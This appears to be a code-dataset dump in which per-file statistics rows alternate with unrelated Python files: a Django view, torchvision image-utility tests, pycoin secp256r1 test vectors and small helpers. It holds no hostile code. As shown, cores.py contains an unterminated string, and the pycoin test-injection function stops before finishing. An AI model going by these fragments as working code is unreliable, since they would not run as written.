| 51.08547 | 119 | 0.682249 | 3,818 | 29,885 | 5.22001 | 0.083028 | 0.032514 | 0.054792 | 0.025289 | 0.811741 | 0.784496 | 0.770697 | 0.755695 | 0.727546 | 0.723583 | 0 | 0.006025 | 0.261402 | 29,885 | 584 | 120 | 51.172945 | 0.896888 | 0.631822 | 0 | 0.447368 | 0 | 0 | 0.024157 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.036842 | 0 | 0.147368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9705781cb6445084669d3cc49b1e93d430b433f | 115 | py | Python | findaridepublic/views.py | benjaminwsebastian/gidek | e24fa3b24913cb0e21512161bb31221f4422798b | [
"MIT"
] | null | null | null | findaridepublic/views.py | benjaminwsebastian/gidek | e24fa3b24913cb0e21512161bb31221f4422798b | [
"MIT"
] | 5 | 2021-03-30T14:03:51.000Z | 2021-09-22T19:29:55.000Z | findaridepublic/views.py | benjaminwsebastian/gidek | e24fa3b24913cb0e21512161bb31221f4422798b | [
"MIT"
] | null | null | null | from django.shortcuts import render
def search(request):
    """Render the public ride-search page."""
    template_name = 'findaridepublic/search.html'
    return render(request, template_name)
b9893cdd1acf685b6892dcee4a0efdcb229bac36 | 9,297 | py | Python | test/test_utils.py | zhangguanheng66/vision | 37eb37a836fbc2c26197dfaf76d2a3f4f39f15df | [
"BSD-3-Clause"
] | 1 | 2021-04-04T15:59:59.000Z | 2021-04-04T15:59:59.000Z | test/test_utils.py | zhangguanheng66/vision | 37eb37a836fbc2c26197dfaf76d2a3f4f39f15df | [
"BSD-3-Clause"
] | null | null | null | test/test_utils.py | zhangguanheng66/vision | 37eb37a836fbc2c26197dfaf76d2a3f4f39f15df | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import os
import sys
import tempfile
import torch
import torchvision.utils as utils
import unittest
from io import BytesIO
import torchvision.transforms.functional as F
from PIL import Image
boxes = torch.tensor([[0, 0, 20, 20], [0, 0, 0, 0],
[10, 15, 30, 35], [23, 35, 93, 95]], dtype=torch.float)
masks = torch.tensor([
[
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799],
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799],
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799],
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799]
],
[
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
[-2.2799, -2.2799, -2.2799, -2.2799, -2.2799],
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541]
],
[
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541],
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541],
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541],
[-1.4541, -1.4541, -1.4541, -1.4541, -1.4541],
[5.0914, 5.0914, 5.0914, 5.0914, 5.0914],
]
], dtype=torch.float)
class Tester(unittest.TestCase):
def test_make_grid_not_inplace(self):
t = torch.rand(5, 3, 10, 10)
t_clone = t.clone()
utils.make_grid(t, normalize=False)
self.assertTrue(torch.equal(t, t_clone), 'make_grid modified tensor in-place')
utils.make_grid(t, normalize=True, scale_each=False)
self.assertTrue(torch.equal(t, t_clone), 'make_grid modified tensor in-place')
utils.make_grid(t, normalize=True, scale_each=True)
self.assertTrue(torch.equal(t, t_clone), 'make_grid modified tensor in-place')
def test_normalize_in_make_grid(self):
t = torch.rand(5, 3, 10, 10) * 255
norm_max = torch.tensor(1.0)
norm_min = torch.tensor(0.0)
grid = utils.make_grid(t, normalize=True)
grid_max = torch.max(grid)
grid_min = torch.min(grid)
# Rounding the result to one decimal for comparison
n_digits = 1
rounded_grid_max = torch.round(grid_max * 10 ** n_digits) / (10 ** n_digits)
rounded_grid_min = torch.round(grid_min * 10 ** n_digits) / (10 ** n_digits)
self.assertTrue(torch.equal(norm_max, rounded_grid_max), 'Normalized max is not equal to 1')
self.assertTrue(torch.equal(norm_min, rounded_grid_min), 'Normalized min is not equal to 0')
@unittest.skipIf(sys.platform in ('win32', 'cygwin'), 'temporarily disabled on Windows')
def test_save_image(self):
with tempfile.NamedTemporaryFile(suffix='.png') as f:
t = torch.rand(2, 3, 64, 64)
utils.save_image(t, f.name)
self.assertTrue(os.path.exists(f.name), 'The image is not present after save')
@unittest.skipIf(sys.platform in ('win32', 'cygwin'), 'temporarily disabled on Windows')
def test_save_image_single_pixel(self):
with tempfile.NamedTemporaryFile(suffix='.png') as f:
t = torch.rand(1, 3, 1, 1)
utils.save_image(t, f.name)
self.assertTrue(os.path.exists(f.name), 'The pixel image is not present after save')
@unittest.skipIf(sys.platform in ('win32', 'cygwin'), 'temporarily disabled on Windows')
def test_save_image_file_object(self):
with tempfile.NamedTemporaryFile(suffix='.png') as f:
t = torch.rand(2, 3, 64, 64)
utils.save_image(t, f.name)
img_orig = Image.open(f.name)
fp = BytesIO()
utils.save_image(t, fp, format='png')
img_bytes = Image.open(fp)
self.assertTrue(torch.equal(F.to_tensor(img_orig), F.to_tensor(img_bytes)),
'Image not stored in file object')
@unittest.skipIf(sys.platform in ('win32', 'cygwin'), 'temporarily disabled on Windows')
def test_save_image_single_pixel_file_object(self):
with tempfile.NamedTemporaryFile(suffix='.png') as f:
t = torch.rand(1, 3, 1, 1)
utils.save_image(t, f.name)
img_orig = Image.open(f.name)
fp = BytesIO()
utils.save_image(t, fp, format='png')
img_bytes = Image.open(fp)
self.assertTrue(torch.equal(F.to_tensor(img_orig), F.to_tensor(img_bytes)),
'Pixel Image not stored in file object')
def test_draw_boxes(self):
img = torch.full((3, 100, 100), 255, dtype=torch.uint8)
img_cp = img.clone()
boxes_cp = boxes.clone()
labels = ["a", "b", "c", "d"]
colors = ["green", "#FF00FF", (0, 255, 0), "red"]
result = utils.draw_bounding_boxes(img, boxes, labels=labels, colors=colors, fill=True)
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets", "fakedata", "draw_boxes_util.png")
if not os.path.exists(path):
res = Image.fromarray(result.permute(1, 2, 0).contiguous().numpy())
res.save(path)
expected = torch.as_tensor(np.array(Image.open(path))).permute(2, 0, 1)
self.assertTrue(torch.equal(result, expected))
# Check if modification is not in place
self.assertTrue(torch.all(torch.eq(boxes, boxes_cp)).item())
self.assertTrue(torch.all(torch.eq(img, img_cp)).item())
def test_draw_boxes_vanilla(self):
img = torch.full((3, 100, 100), 0, dtype=torch.uint8)
img_cp = img.clone()
boxes_cp = boxes.clone()
result = utils.draw_bounding_boxes(img, boxes, fill=False, width=7)
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets", "fakedata", "draw_boxes_vanilla.png")
if not os.path.exists(path):
res = Image.fromarray(result.permute(1, 2, 0).contiguous().numpy())
res.save(path)
expected = torch.as_tensor(np.array(Image.open(path))).permute(2, 0, 1)
self.assertTrue(torch.equal(result, expected))
# Check if modification is not in place
self.assertTrue(torch.all(torch.eq(boxes, boxes_cp)).item())
self.assertTrue(torch.all(torch.eq(img, img_cp)).item())
def test_draw_invalid_boxes(self):
img_tp = ((1, 1, 1), (1, 2, 3))
img_wrong1 = torch.full((3, 5, 5), 255, dtype=torch.float)
img_wrong2 = torch.full((1, 3, 5, 5), 255, dtype=torch.uint8)
boxes = torch.tensor([[0, 0, 20, 20], [0, 0, 0, 0],
[10, 15, 30, 35], [23, 35, 93, 95]], dtype=torch.float)
self.assertRaises(TypeError, utils.draw_bounding_boxes, img_tp, boxes)
self.assertRaises(ValueError, utils.draw_bounding_boxes, img_wrong1, boxes)
self.assertRaises(ValueError, utils.draw_bounding_boxes, img_wrong2, boxes)
def test_draw_segmentation_masks_colors(self):
img = torch.full((3, 5, 5), 255, dtype=torch.uint8)
img_cp = img.clone()
masks_cp = masks.clone()
colors = ["#FF00FF", (0, 255, 0), "red"]
result = utils.draw_segmentation_masks(img, masks, colors=colors)
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets",
"fakedata", "draw_segm_masks_colors_util.png")
if not os.path.exists(path):
res = Image.fromarray(result.permute(1, 2, 0).contiguous().numpy())
res.save(path)
expected = torch.as_tensor(np.array(Image.open(path))).permute(2, 0, 1)
self.assertTrue(torch.equal(result, expected))
# Check if modification is not in place
self.assertTrue(torch.all(torch.eq(img, img_cp)).item())
self.assertTrue(torch.all(torch.eq(masks, masks_cp)).item())
def test_draw_segmentation_masks_no_colors(self):
    """Draw segmentation masks with colors=None (auto-assigned palette) and
    compare against a golden PNG.

    NOTE(review): `masks` is presumably a module-level fixture defined
    earlier in the file — confirm.
    """
    img = torch.full((3, 20, 20), 255, dtype=torch.uint8)
    img_cp = img.clone()
    masks_cp = masks.clone()
    result = utils.draw_segmentation_masks(img, masks, colors=None)
    path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets",
                        "fakedata", "draw_segm_masks_no_colors_util.png")
    # First run bootstraps the golden file; later runs compare against it.
    if not os.path.exists(path):
        res = Image.fromarray(result.permute(1, 2, 0).contiguous().numpy())
        res.save(path)
    expected = torch.as_tensor(np.array(Image.open(path))).permute(2, 0, 1)
    self.assertTrue(torch.equal(result, expected))
    # Check if modification is not in place
    self.assertTrue(torch.all(torch.eq(img, img_cp)).item())
    self.assertTrue(torch.all(torch.eq(masks, masks_cp)).item())
def test_draw_invalid_masks(self):
    """draw_segmentation_masks rejects non-tensor, float, batched, and
    4-channel images."""
    img_tp = ((1, 1, 1), (1, 2, 3))
    img_wrong1 = torch.full((3, 5, 5), 255, dtype=torch.float)
    img_wrong2 = torch.full((1, 3, 5, 5), 255, dtype=torch.uint8)
    img_wrong3 = torch.full((4, 5, 5), 255, dtype=torch.uint8)
    with self.assertRaises(TypeError):
        utils.draw_segmentation_masks(img_tp, masks)
    with self.assertRaises(ValueError):
        utils.draw_segmentation_masks(img_wrong1, masks)
    with self.assertRaises(ValueError):
        utils.draw_segmentation_masks(img_wrong2, masks)
    with self.assertRaises(ValueError):
        utils.draw_segmentation_masks(img_wrong3, masks)
if __name__ == '__main__':
unittest.main()
| 44.483254 | 119 | 0.613961 | 1,344 | 9,297 | 4.106399 | 0.120536 | 0.022649 | 0.026092 | 0.043486 | 0.85251 | 0.811016 | 0.777496 | 0.758833 | 0.723863 | 0.670955 | 0 | 0.086694 | 0.234484 | 9,297 | 208 | 120 | 44.697115 | 0.688773 | 0.02162 | 0 | 0.547619 | 0 | 0 | 0.076898 | 0.009571 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.071429 | false | 0 | 0.059524 | 0 | 0.136905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9e06ba2fe6a186870528ca52691c63cd5890d0c | 35 | py | Python | cores.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | cores.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | cores.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | vermelho='\033[0;30;41m
fim=\033[m' | 17.5 | 23 | 0.685714 | 8 | 35 | 3 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.323529 | 0.028571 | 35 | 2 | 24 | 17.5 | 0.382353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9eb2aa4e4548291c813b9e418fe0d469833c8de | 179 | py | Python | common/strings.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | common/strings.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | common/strings.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null |
import random as random_lib
import string
def random(length=8, chars=string.ascii_letters + string.digits):
    """Return a random string of *length* characters drawn (with
    replacement, uniformly) from *chars*."""
    return ''.join(random_lib.choices(chars, k=length))
| 22.375 | 67 | 0.759777 | 27 | 179 | 4.888889 | 0.666667 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 0.134078 | 179 | 7 | 68 | 25.571429 | 0.845161 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b9f52a3d61b7633caed221f498a4cd586fc87066 | 263 | py | Python | Metrics/code/accuracy_score.py | TannerGilbert/Machine-Learning-Explained | 5309f44a38ce862f3f177e8d5de2e60eea44637b | [
"MIT"
] | 24 | 2020-09-14T18:55:13.000Z | 2022-03-22T22:14:30.000Z | Metrics/code/accuracy_score.py | TannerGilbert/Machine-Learning-Explained | 5309f44a38ce862f3f177e8d5de2e60eea44637b | [
"MIT"
] | null | null | null | Metrics/code/accuracy_score.py | TannerGilbert/Machine-Learning-Explained | 5309f44a38ce862f3f177e8d5de2e60eea44637b | [
"MIT"
] | 6 | 2021-02-06T15:34:27.000Z | 2022-01-31T23:16:07.000Z | import numpy as np
class Accuracy:
    """Fraction of predictions equal to targets, normalised by the size of
    the first axis (``y.shape[0]``)."""

    def __call__(self, y: np.ndarray, y_pred: np.ndarray) -> np.float64:
        # Callable alias for loss().
        return self.loss(y, y_pred)

    def loss(self, y: np.ndarray, y_pred: np.ndarray) -> np.float64:
        matches = np.sum(y == y_pred)
        return matches / y.shape[0]
dbdf21bfca5127059a51711599cea420d79d6972 | 23 | py | Python | core/forms/__init__.py | jeffersonkr/drink_flow_control | 7dc6d97bce6110b34d309fa61079385e6f3efde5 | [
"MIT"
] | null | null | null | core/forms/__init__.py | jeffersonkr/drink_flow_control | 7dc6d97bce6110b34d309fa61079385e6f3efde5 | [
"MIT"
] | 1 | 2022-02-10T08:42:42.000Z | 2022-02-10T08:42:42.000Z | core/forms/__init__.py | jeffersonkr/drink_flow_control | 7dc6d97bce6110b34d309fa61079385e6f3efde5 | [
"MIT"
] | null | null | null | from . import user_form | 23 | 23 | 0.826087 | 4 | 23 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 23 | 1 | 23 | 23 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dbf5d56657d994117084de59beb19f3813d40bd2 | 10,967 | py | Python | tests/ecdsa/secp256r1_test.py | jaschadub/pycoin | 1e8d0d9fe20ce0347b97847bb529cd1bd84c7442 | [
"MIT"
] | 1,210 | 2015-01-02T13:36:28.000Z | 2022-03-30T00:52:22.000Z | tests/ecdsa/secp256r1_test.py | impactog/pycoin | 3db6f82afa3054d8d07caca4909e1aed3de2fceb | [
"MIT"
] | 280 | 2015-01-05T23:16:47.000Z | 2022-02-22T22:02:17.000Z | tests/ecdsa/secp256r1_test.py | impactog/pycoin | 3db6f82afa3054d8d07caca4909e1aed3de2fceb | [
"MIT"
] | 459 | 2015-01-10T00:15:57.000Z | 2022-03-16T12:04:40.000Z | import unittest
from pycoin.ecdsa.secp256r1 import secp256r1_generator
VECTORS = """
k = 1
x = 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
y = 4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5
k = 2
x = 7CF27B188D034F7E8A52380304B51AC3C08969E277F21B35A60B48FC47669978
y = 07775510DB8ED040293D9AC69F7430DBBA7DADE63CE982299E04B79D227873D1
k = 3
x = 5ECBE4D1A6330A44C8F7EF951D4BF165E6C6B721EFADA985FB41661BC6E7FD6C
y = 8734640C4998FF7E374B06CE1A64A2ECD82AB036384FB83D9A79B127A27D5032
k = 4
x = E2534A3532D08FBBA02DDE659EE62BD0031FE2DB785596EF509302446B030852
y = E0F1575A4C633CC719DFEE5FDA862D764EFC96C3F30EE0055C42C23F184ED8C6
k = 5
x = 51590B7A515140D2D784C85608668FDFEF8C82FD1F5BE52421554A0DC3D033ED
y = E0C17DA8904A727D8AE1BF36BF8A79260D012F00D4D80888D1D0BB44FDA16DA4
k = 6
x = B01A172A76A4602C92D3242CB897DDE3024C740DEBB215B4C6B0AAE93C2291A9
y = E85C10743237DAD56FEC0E2DFBA703791C00F7701C7E16BDFD7C48538FC77FE2
k = 7
x = 8E533B6FA0BF7B4625BB30667C01FB607EF9F8B8A80FEF5B300628703187B2A3
y = 73EB1DBDE03318366D069F83A6F5900053C73633CB041B21C55E1A86C1F400B4
k = 8
x = 62D9779DBEE9B0534042742D3AB54CADC1D238980FCE97DBB4DD9DC1DB6FB393
y = AD5ACCBD91E9D8244FF15D771167CEE0A2ED51F6BBE76A78DA540A6A0F09957E
k = 9
x = EA68D7B6FEDF0B71878938D51D71F8729E0ACB8C2C6DF8B3D79E8A4B90949EE0
y = 2A2744C972C9FCE787014A964A8EA0C84D714FEAA4DE823FE85A224A4DD048FA
k = 10
x = CEF66D6B2A3A993E591214D1EA223FB545CA6C471C48306E4C36069404C5723F
y = 878662A229AAAE906E123CDD9D3B4C10590DED29FE751EEECA34BBAA44AF0773
k = 11
x = 3ED113B7883B4C590638379DB0C21CDA16742ED0255048BF433391D374BC21D1
y = 9099209ACCC4C8A224C843AFA4F4C68A090D04DA5E9889DAE2F8EEFCE82A3740
k = 12
x = 741DD5BDA817D95E4626537320E5D55179983028B2F82C99D500C5EE8624E3C4
y = 0770B46A9C385FDC567383554887B1548EEB912C35BA5CA71995FF22CD4481D3
k = 13
x = 177C837AE0AC495A61805DF2D85EE2FC792E284B65EAD58A98E15D9D46072C01
y = 63BB58CD4EBEA558A24091ADB40F4E7226EE14C3A1FB4DF39C43BBE2EFC7BFD8
k = 14
x = 54E77A001C3862B97A76647F4336DF3CF126ACBE7A069C5E5709277324D2920B
y = F599F1BB29F4317542121F8C05A2E7C37171EA77735090081BA7C82F60D0B375
k = 15
x = F0454DC6971ABAE7ADFB378999888265AE03AF92DE3A0EF163668C63E59B9D5F
y = B5B93EE3592E2D1F4E6594E51F9643E62A3B21CE75B5FA3F47E59CDE0D034F36
k = 16
x = 76A94D138A6B41858B821C629836315FCD28392EFF6CA038A5EB4787E1277C6E
y = A985FE61341F260E6CB0A1B5E11E87208599A0040FC78BAA0E9DDD724B8C5110
k = 17
x = 47776904C0F1CC3A9C0984B66F75301A5FA68678F0D64AF8BA1ABCE34738A73E
y = AA005EE6B5B957286231856577648E8381B2804428D5733F32F787FF71F1FCDC
k = 18
x = 1057E0AB5780F470DEFC9378D1C7C87437BB4C6F9EA55C63D936266DBD781FDA
y = F6F1645A15CBE5DC9FA9B7DFD96EE5A7DCC11B5C5EF4F1F78D83B3393C6A45A2
k = 19
x = CB6D2861102C0C25CE39B7C17108C507782C452257884895C1FC7B74AB03ED83
y = 58D7614B24D9EF515C35E7100D6D6CE4A496716E30FA3E03E39150752BCECDAA
k = 20
x = 83A01A9378395BAB9BCD6A0AD03CC56D56E6B19250465A94A234DC4C6B28DA9A
y = 76E49B6DE2F73234AE6A5EB9D612B75C9F2202BB6923F54FF8240AAA86F640B8
k = 112233445566778899
x = 339150844EC15234807FE862A86BE77977DBFB3AE3D96F4C22795513AEAAB82F
y = B1C14DDFDC8EC1B2583F51E85A5EB3A155840F2034730E9B5ADA38B674336A21
k = 112233445566778899112233445566778899
x = 1B7E046A076CC25E6D7FA5003F6729F665CC3241B5ADAB12B498CD32F2803264
y = BFEA79BE2B666B073DB69A2A241ADAB0738FE9D2DD28B5604EB8C8CF097C457B
k = 29852220098221261079183923314599206100666902414330245206392788703677545185283
x = 9EACE8F4B071E677C5350B02F2BB2B384AAE89D58AA72CA97A170572E0FB222F
y = 1BBDAEC2430B09B93F7CB08678636CE12EAAFD58390699B5FD2F6E1188FC2A78
k = 57896042899961394862005778464643882389978449576758748073725983489954366354431
x = 878F22CC6DB6048D2B767268F22FFAD8E56AB8E2DC615F7BD89F1E350500DD8D
y = 714A5D7BB901C9C5853400D12341A892EF45D87FC553786756C4F0C9391D763E
k = 1766845392945710151501889105729049882997660004824848915955419660366636031
x = 659A379625AB122F2512B8DADA02C6348D53B54452DFF67AC7ACE4E8856295CA
y = 49D81AB97B648464D0B4A288BD7818FAB41A16426E943527C4FED8736C53D0F6
k = 28948025760307534517734791687894775804466072615242963443097661355606862201087
x = CBCEAAA8A4DD44BBCE58E8DB7740A5510EC2CB7EA8DA8D8F036B3FB04CDA4DE4
y = 4BD7AA301A80D7F59FD983FEDBE59BB7B2863FE46494935E3745B360E32332FA
k = 113078210460870548944811695960290644973229224625838436424477095834645696384
x = F0C4A0576154FF3A33A3460D42EAED806E854DFA37125221D37935124BA462A4
y = 5B392FA964434D29EEC6C9DBC261CF116796864AA2FAADB984A2DF38D1AEF7A3
k = 12078056106883488161242983286051341125085761470677906721917479268909056
x = 5E6C8524B6369530B12C62D31EC53E0288173BD662BDF680B53A41ECBCAD00CC
y = 447FE742C2BFEF4D0DB14B5B83A2682309B5618E0064A94804E9282179FE089F
k = 57782969857385448082319957860328652998540760998293976083718804450708503920639
x = 03792E541BC209076A3D7920A915021ECD396A6EB5C3960024BE5575F3223484
y = FC774AE092403101563B712F68170312304F20C80B40C06282063DB25F268DE4
k = 57896017119460046759583662757090100341435943767777707906455551163257755533312
x = 2379FF85AB693CDF901D6CE6F2473F39C04A2FE3DCD842CE7AAB0E002095BCF8
y = F8B476530A634589D5129E46F322B02FBC610A703D80875EE70D7CE1877436A1
k = 452312848374287284681282171017647412726433684238464212999305864837160993279
x = C1E4072C529BF2F44DA769EFC934472848003B3AF2C0F5AA8F8DDBD53E12ED7C
y = 39A6EE77812BB37E8079CD01ED649D3830FCA46F718C1D3993E4A591824ABCDB
k = 904571339174065134293634407946054000774746055866917729876676367558469746684
x = 34DFBC09404C21E250A9B40FA8772897AC63A094877DB65862B61BD1507B34F3
y = CF6F8A876C6F99CEAEC87148F18C7E1E0DA6E165FFC8ED82ABB65955215F77D3
k = 115792089210356248762697446949407573529996955224135760342422259061068512044349
x = 83A01A9378395BAB9BCD6A0AD03CC56D56E6B19250465A94A234DC4C6B28DA9A
y = 891B64911D08CDCC5195A14629ED48A360DDFD4596DC0AB007DBF5557909BF47
k = 115792089210356248762697446949407573529996955224135760342422259061068512044350
x = CB6D2861102C0C25CE39B7C17108C507782C452257884895C1FC7B74AB03ED83
y = A7289EB3DB2610AFA3CA18EFF292931B5B698E92CF05C1FC1C6EAF8AD4313255
k = 115792089210356248762697446949407573529996955224135760342422259061068512044351
x = 1057E0AB5780F470DEFC9378D1C7C87437BB4C6F9EA55C63D936266DBD781FDA
y = 090E9BA4EA341A246056482026911A58233EE4A4A10B0E08727C4CC6C395BA5D
k = 115792089210356248762697446949407573529996955224135760342422259061068512044352
x = 47776904C0F1CC3A9C0984B66F75301A5FA68678F0D64AF8BA1ABCE34738A73E
y = 55FFA1184A46A8D89DCE7A9A889B717C7E4D7FBCD72A8CC0CD0878008E0E0323
k = 115792089210356248762697446949407573529996955224135760342422259061068512044353
x = 76A94D138A6B41858B821C629836315FCD28392EFF6CA038A5EB4787E1277C6E
y = 567A019DCBE0D9F2934F5E4A1EE178DF7A665FFCF0387455F162228DB473AEEF
k = 115792089210356248762697446949407573529996955224135760342422259061068512044354
x = F0454DC6971ABAE7ADFB378999888265AE03AF92DE3A0EF163668C63E59B9D5F
y = 4A46C11BA6D1D2E1B19A6B1AE069BC19D5C4DE328A4A05C0B81A6321F2FCB0C9
k = 115792089210356248762697446949407573529996955224135760342422259061068512044355
x = 54E77A001C3862B97A76647F4336DF3CF126ACBE7A069C5E5709277324D2920B
y = 0A660E43D60BCE8BBDEDE073FA5D183C8E8E15898CAF6FF7E45837D09F2F4C8A
k = 115792089210356248762697446949407573529996955224135760342422259061068512044356
x = 177C837AE0AC495A61805DF2D85EE2FC792E284B65EAD58A98E15D9D46072C01
y = 9C44A731B1415AA85DBF6E524BF0B18DD911EB3D5E04B20C63BC441D10384027
k = 115792089210356248762697446949407573529996955224135760342422259061068512044357
x = 741DD5BDA817D95E4626537320E5D55179983028B2F82C99D500C5EE8624E3C4
y = F88F4B9463C7A024A98C7CAAB7784EAB71146ED4CA45A358E66A00DD32BB7E2C
k = 115792089210356248762697446949407573529996955224135760342422259061068512044358
x = 3ED113B7883B4C590638379DB0C21CDA16742ED0255048BF433391D374BC21D1
y = 6F66DF64333B375EDB37BC505B0B3975F6F2FB26A16776251D07110317D5C8BF
k = 115792089210356248762697446949407573529996955224135760342422259061068512044359
x = CEF66D6B2A3A993E591214D1EA223FB545CA6C471C48306E4C36069404C5723F
y = 78799D5CD655517091EDC32262C4B3EFA6F212D7018AE11135CB4455BB50F88C
k = 115792089210356248762697446949407573529996955224135760342422259061068512044360
x = EA68D7B6FEDF0B71878938D51D71F8729E0ACB8C2C6DF8B3D79E8A4B90949EE0
y = D5D8BB358D36031978FEB569B5715F37B28EB0165B217DC017A5DDB5B22FB705
k = 115792089210356248762697446949407573529996955224135760342422259061068512044361
x = 62D9779DBEE9B0534042742D3AB54CADC1D238980FCE97DBB4DD9DC1DB6FB393
y = 52A533416E1627DCB00EA288EE98311F5D12AE0A4418958725ABF595F0F66A81
k = 115792089210356248762697446949407573529996955224135760342422259061068512044362
x = 8E533B6FA0BF7B4625BB30667C01FB607EF9F8B8A80FEF5B300628703187B2A3
y = 8C14E2411FCCE7CA92F9607C590A6FFFAC38C9CD34FBE4DE3AA1E5793E0BFF4B
k = 115792089210356248762697446949407573529996955224135760342422259061068512044363
x = B01A172A76A4602C92D3242CB897DDE3024C740DEBB215B4C6B0AAE93C2291A9
y = 17A3EF8ACDC8252B9013F1D20458FC86E3FF0890E381E9420283B7AC7038801D
k = 115792089210356248762697446949407573529996955224135760342422259061068512044364
x = 51590B7A515140D2D784C85608668FDFEF8C82FD1F5BE52421554A0DC3D033ED
y = 1F3E82566FB58D83751E40C9407586D9F2FED1002B27F7772E2F44BB025E925B
k = 115792089210356248762697446949407573529996955224135760342422259061068512044365
x = E2534A3532D08FBBA02DDE659EE62BD0031FE2DB785596EF509302446B030852
y = 1F0EA8A4B39CC339E62011A02579D289B103693D0CF11FFAA3BD3DC0E7B12739
k = 115792089210356248762697446949407573529996955224135760342422259061068512044366
x = 5ECBE4D1A6330A44C8F7EF951D4BF165E6C6B721EFADA985FB41661BC6E7FD6C
y = 78CB9BF2B6670082C8B4F931E59B5D1327D54FCAC7B047C265864ED85D82AFCD
k = 115792089210356248762697446949407573529996955224135760342422259061068512044367
x = 7CF27B188D034F7E8A52380304B51AC3C08969E277F21B35A60B48FC47669978
y = F888AAEE24712FC0D6C26539608BCF244582521AC3167DD661FB4862DD878C2E
k = 115792089210356248762697446949407573529996955224135760342422259061068512044368
x = 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
y = B01CBD1C01E58065711814B583F061E9D431CCA994CEA1313449BF97C840AE0A
"""
class Secp256r1Test(unittest.TestCase):
    """Sanity checks for scalar multiplication on the secp256r1 generator."""

    def test_multiply(self):
        # Scaling (a * G) by b must equal computing (a * b) * G directly.
        for a in [15, 10000, 73**38]:
            for b in [2, 3, 78192, 71**39]:
                left = b * (a * secp256r1_generator)
                right = (a * b) * secp256r1_generator
                self.assertEqual(left, right)
def inject():
    """Attach one ``test_vector_<k>`` method to Secp256r1Test for every
    (k, x, y) triplet found in VECTORS."""
    for triplet in VECTORS.strip().split("\n\n"):
        k_line, x_line, y_line = triplet.split("\n")
        well_formed = (k_line.startswith("k = ")
                       and x_line.startswith("x = ")
                       and y_line.startswith("y = "))
        if not well_formed:
            print("WARNING: bad vector %s" % repr(triplet))
            continue
        k = int(k_line[4:])
        x = int(x_line[4:], 16)
        y = int(y_line[4:], 16)

        # Factory binds k, x, y per iteration (avoids late-binding closures).
        def make_test(k, x, y):
            def the_test(self):
                self.assertEqual(k * secp256r1_generator, (x, y))
            return the_test

